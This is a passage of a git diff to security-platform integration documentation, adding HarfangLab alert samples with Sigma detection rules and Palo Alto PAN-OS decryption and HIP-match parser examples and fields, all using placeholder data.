2023/12/28\nmodified: 2024/01/10\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1189.001\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessOriginalFileName: AppInstaller.exe\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\n\n exclusion_knownurl:\n RequestUrlHost:\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\n - windbg.download.prss.microsoft.com # windbg.appinstaller\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\n condition: selection and not 1 of exclusion_*\nlevel: medium", + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "threat_type": "commandline", + "threat_values": [ + ":\\program files\\windowsapps\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca" + ], + "threat_key": 1343, + "groups": [ + { + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "DOMAIN_Postes_de_travail_Windows" + } + ] + } + ``` + + + +=== "alert_5" + + + ```json + { + "type": "rtlogs", + "level": "medium", + "maturity": "stable", + "quarantine": 4, + "rule_content": "title: User Account Added to the Local Administrators Group\nid: 12345678-abcd-ef90-1234-123456abcdef\ndescription: \"Detects when a user account is added into the local Administrators group.\\n\nThis action can be the result of a malicious activity.\"\nreferences:\n - https://attack.mitre.org/techniques/T1098/\n - https://attack.mitre.org/techniques/T1078/003/\nstatus: stable\ndate: 2021/04/28\nmodified: 2021/01/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.privilege_escalation\n - attack.t1078.003\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4732\n GroupSid: S-1-2-3-4\n exclusion:\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\n - SubjectUserName|endswith: \n condition: selection and not exclusion\nfalsepositives:\n - Legitimate administrator action\nlevel: medium", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "rule_name": "User Account Added to the Local Administrators Group", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078.003", + "attack.t1098" + ], + "level_int": 30, + "eventlog": { + "level": "log_always", + "type": "wineventlog", + "detection_timestamp": "2024/11/12 08:39:13.967", + "event_id": 4732, + "event_data": { + "SubjectUserSid": "S-1-2-4-5-6", + "SubjectDomainName": "NT_DOMAIN", + "PrivilegeList": "-", + "TargetDomainName": "Builtin", + "TargetUserName": "Administrateurs", + "MemberSid": "S-1-2-4-7-8", + "MemberName": "NT_DOMAIN\\DOEJ", + "SubjectUserName": "sw-suser", + "TargetSid": "S-1-2-3-4", + "SubjectLogonId": "0x1234567" + }, + "record_number": 174136362, + "event_date": "2024-11-12T08:39:13.205Z", + "sigma_rule_content": "title: User Account Added to the Local Administrators Group\nid: 12345678-abcd-ef90-1234-123456abcdef\ndescription: \"Detects when a user account is added into the local Administrators group.\\n\nThis action can be the result of a malicious activity.\"\nreferences:\n - https://attack.mitre.org/techniques/T1098/\n - https://attack.mitre.org/techniques/T1078/003/\nstatus: stable\ndate: 2021/04/28\nmodified: 2021/01/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.privilege_escalation\n - attack.t1078.003\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4732\n GroupSid: S-1-2-3-4\n exclusion:\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\n - SubjectUserName|endswith: \n condition: selection and not exclusion\nfalsepositives:\n - Legitimate administrator action\nlevel: medium", + "source_name": "Microsoft-Windows-Security-Auditing", + "dont_create_eventlog": true, + "user": { + "domain": "", + "name": "", + "type": "unknown", + "identifier": "" + }, + "thread_id": 1728, + "log_name": "Security", + "process_id": 1224, + "status": 0, + "ioc_matches": [], + "provider_guid": "54849625-5478-4994-a5ba-3e3b0328c30d", + "keywords": [ + "AuditSuccess", + "ReservedKeyword63" + ], + "log_type": "eventlog", + "computer_name": "PC01.domain.com", + "user_data": {}, + "system_event_type": "event_log_event" + }, + "threat_values": [], + "destination": "syslog", + "@timestamp": "2024-11-12T08:39:14.017Z", + "detection_date": "2024-11-12T08:39:13.967+00:00", + "@event_create_date": "2024-11-12T08:39:14.017Z", + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_type": "sigma", + "rule_id": "12345678-abcd-ef90-1234-123456abcdef", + "ingestion_date": "2024-11-12T08:39:14.017+00:00", + "tenant": "3b37ffc8520ef542", + "threat_type": "new", + "groups": [ + { + "name": "Postes de travail", + "id": "11111111-2222-3333-4444-555555555555" + }, + { + "name": "Postes de travail : Lot 3", + "id": "66666666-7777-8888-9999-000000000000" + } + ], + "status": "new", + "execution": 0, + "agent": { + "agentid": "11111111-aaaa-2222-bbbb-333333333333", + "domain": null, + "osproducttype": "Windows 10 Enterprise", + "ostype": "windows", + "dnsdomainname": "domain.com", + "distroid": null, + "domainname": "NT_DOMAIN", + "osversion": "10.0.19045", + "hostname": "PC01", + "version": "4.1.6", + "additional_info": {} + }, + "threat_key": "20528", + "mitre_cells": [ + "persistence__t1078.003", + "persistence__t1098", + "privilege-escalation__t1078.003", + "privilege-escalation__t1098" + ], + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "log_type": "alert", + "@version": "1", + "msg": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "alert_subtype": "eventlog", + "detection_origin": "agent" + } + ``` + + + === "alert_false_positive" diff --git a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md index a53c2a6c8..7a2fbcbec 100644 --- a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md +++ b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899.md @@ -44,8 +44,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "name": "root" - }, - "wallix": {} + } } ``` @@ -68,8 +67,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "name": "wabuser" - }, - "wallix": {} + } } ``` @@ -155,21 +153,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "rexec.json" - - ```json - - { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } - - ``` - - === "session_integrity.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899_sample.md b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899_sample.md index 2207a1103..a1af56bbc 100644 --- a/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899_sample.md +++ b/_shared_content/operations_center/integrations/generated/6b8cb346-6605-4240-ac15-3828627ba899_sample.md @@ -40,14 +40,6 @@ In this section, you will find examples of raw logs as generated natively by the -=== "rexec" - - ``` - rexec line 15: Deprecated option UsePrivilegeSeparation - ``` - - - === "session_integrity" ``` diff --git a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md index 56f4ce796..a8f145896 100644 --- a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md +++ b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd.md @@ -720,6 +720,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" @@ -795,6 +796,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -1261,7 +1263,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -1294,9 +1296,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" @@ -1604,6 +1606,216 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_decryption_csv.json" + + ```json + + { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_decryption_json.json" + + ```json + + { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } + + ``` + + === "test_dhcp_renew_json.json" ```json @@ -2095,7 +2307,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -2116,9 +2328,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } @@ -2148,6 +2360,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -2205,6 +2418,149 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_hipmatch_csv.json" + + ```json + + { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_hipmatch_json.json" + + ```json + + { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } + + ``` + + === "test_installed_package_json.json" ```json @@ -2468,6 +2824,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { @@ -5382,7 +5739,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -5403,9 +5760,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } @@ -5500,7 +5857,10 @@ The following table lists the fields that are extracted, normalized under the EC |`paloalto.threat.id` | `keyword` | The identifier of the threat | |`paloalto.threat.name` | `keyword` | The name of the threat | |`paloalto.threat.type` | `keyword` | The type of the threat | -|`paloalto.vsys` | `keyword` | The virtual system | +|`paloalto.tls.chain_status` | `keyword` | The trust in the TLS chain | +|`paloalto.tls.root_status` | `keyword` | The trust in the root certificate | +|`paloalto.tls.sni` | `keyword` | The server name indication | +|`paloalto.vsys` | `keyword` | the virtual system | |`rule.name` | `keyword` | Rule name | |`rule.uuid` | `keyword` | Rule UUID | |`source.bytes` | `long` | Bytes sent from the source to the destination. | @@ -5512,6 +5872,13 @@ The following table lists the fields that are extracted, normalized under the EC |`source.port` | `long` | Port of the source. | |`source.user.domain` | `keyword` | Name of the directory the user is a member of. | |`source.user.name` | `keyword` | Short name or login of the user. | +|`tls.cipher` | `keyword` | String indicating the cipher used during the current connection. | +|`tls.curve` | `keyword` | String indicating the curve used for the given cipher, when applicable. | +|`tls.server.hash.sha256` | `keyword` | Certificate fingerprint using the SHA256 digest of DER-encoded version of certificate offered by the server. | +|`tls.server.x509.issuer.common_name` | `keyword` | List of common name (CN) of issuing certificate authority. | +|`tls.server.x509.serial_number` | `keyword` | Unique serial number issued by the certificate authority. | +|`tls.server.x509.subject.common_name` | `keyword` | List of common names (CN) of subject. | +|`tls.version` | `keyword` | Numeric part of the version parsed from the original string. | |`url.domain` | `keyword` | Domain of the url. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | |`url.path` | `wildcard` | Path of the request, such as "/search". | diff --git a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md index 11d626144..205c3e9e6 100644 --- a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md +++ b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md @@ -382,6 +382,114 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_decryption_csv" + + + ```json + 1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,ssl,no,no + + ``` + + + +=== "test_decryption_json" + + + ```json + { + "TimeReceived": "2024-11-20T16:40:01.000000Z", + "DeviceSN": "no-serial", + "LogType": "DECRYPTION", + "Subtype": "start", + "SubType": "start", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-11-20T16:39:51.000000Z", + "SourceAddress": "1.2.3.4", + "DestinationAddress": "5.6.7.8", + "NATSource": "4.3.2.1", + "NATDestination": "8.7.6.5", + "Rule": "URL Filtering - Chrome Profile", + "SourceUser": "example\\jdoe", + "DestinationUser": null, + "Application": "incomplete", + "VirtualLocation": "vsys1", + "FromZone": "VPN-SSL", + "ToZone": "INTERNET", + "InboundInterface": "tunnel.16", + "OutboundInterface": "ethernet1/1", + "LogSetting": "Forward-Syslog", + "TimeReceivedManagementPlane": "2024-11-20T16:39:51.000000Z", + "SessionID": 2222222, + "RepeatCount": 1, + "CountOfRepeat": 1, + "SourcePort": 58877, + "DestinationPort": 443, + "NATSourcePort": 1042, + "NATDestinationPort": 443, + "Protocol": "tcp", + "Action": "allow", + "Tunnel": "N/A", + "SourceUUID": null, + "DestinationUUID": null, + "RuleUUID": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5", + "ClientToFirewall": "Finished", + "FirewallToClient": "Client_Hello", + "TLSVersion": "TLS1.2", + "TLSKeyExchange": "ECDHE", + "TLSEncryptionAlgorithm": "AES_256_GCM", + "TLSAuth": "SHA384", + "PolicyName": "TLS - https inspection - default rule", + "EllipticCurve": "secp256r1", + "ErrorIndex": "Protocol", + "RootStatus": "trusted", + "ChainStatus": "Trusted", + "ProxyType": "Forward", + "CertificateSerial": "059125d73c34a73fca9", + "Fingerprint": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "TimeNotBefore": 1730875569, + "TimeNotAfter": 1765176368, + "CertificateVersion": "V3", + "CertificateSize": 256, + "CommonNameLength": 13, + "IssuerNameLength": 29, + "RootCNLength": 10, + "SNILength": 23, + "CertificateFlags": 4, + "CommonName": "example.org", + "IssuerCommonName": "GlobalSign ECC OV SSL CA 2018", + "RootCommonName": "GlobalSign", + "ServerNameIndication": "static.files.example.org", + "ErrorMessage": "General TLS protocol error. Received fatal alert DecodeError from server", + "ContainerID": null, + "ContainerNameSpace": null, + "ContainerName": null, + "SourceEDL": null, + "DestinationEDL": null, + "SourceDynamicAddressGroup": null, + "DestinationDynamicAddressGroup": null, + "TimeGeneratedHighResolution": "2024-11-20T16:39:51.441000Z", + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceHost": null, + "SourceDeviceMac": null, + "DestinationDeviceCategory": null, + "DestinationDeviceProfile": null, + "DestinationDeviceModel": null, + "DestinationDeviceVendor": null, + "DestinationDeviceOSFamily": null, + "DestinationDeviceOSVersion": null, + "DestinationDeviceHost": null, + "DestinationDeviceMac": null, + "SequenceNo": 1111111111111111111 + } + ``` + + + === "test_dhcp_renew_json" @@ -618,6 +726,62 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_hipmatch_csv" + + + ```json + 1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00, + ``` + + + +=== "test_hipmatch_json" + + + ```json + { + "TimeReceived": "2024-11-20T16:30:32.000000Z", + "DeviceSN": "no-serial", + "LogType": "HIPMATCH", + "Subtype": "hipmatch", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-11-20T16:30:28.000000Z", + "SourceUser": "jdoe@example.org", + "VirtualLocation": "vsys1", + "EndpointDeviceName": "DESKTOP-01", + "EndpointOSType": "Windows", + "SourceIP": "1.2.3.4", + "HipMatchName": "VPN Compliant", + "RepeatCount": 1, + "CountOfRepeats": 1, + "HipMatchType": "profile", + "SequenceNo": 1111111111111111111, + "DGHierarchyLevel1": 12, + "DGHierarchyLevel2": 22, + "DGHierarchyLevel3": 0, + "DGHierarchyLevel4": 0, + "VirtualSystemName": "", + "DeviceName": "FW-ALK01", + "VirtualSystemID": 1, + "SourceIPv6": "", + "HostID": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "EndpointSerialNumber": "aefee8", + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceMac": null, + "SourceDeviceHost": null, + "Source": null, + "TimestampDeviceIdentification": null, + "TimeGeneratedHighResolution": "2024-11-20T16:30:28.904000Z" + } + ``` + + + === "test_installed_package_json" diff --git 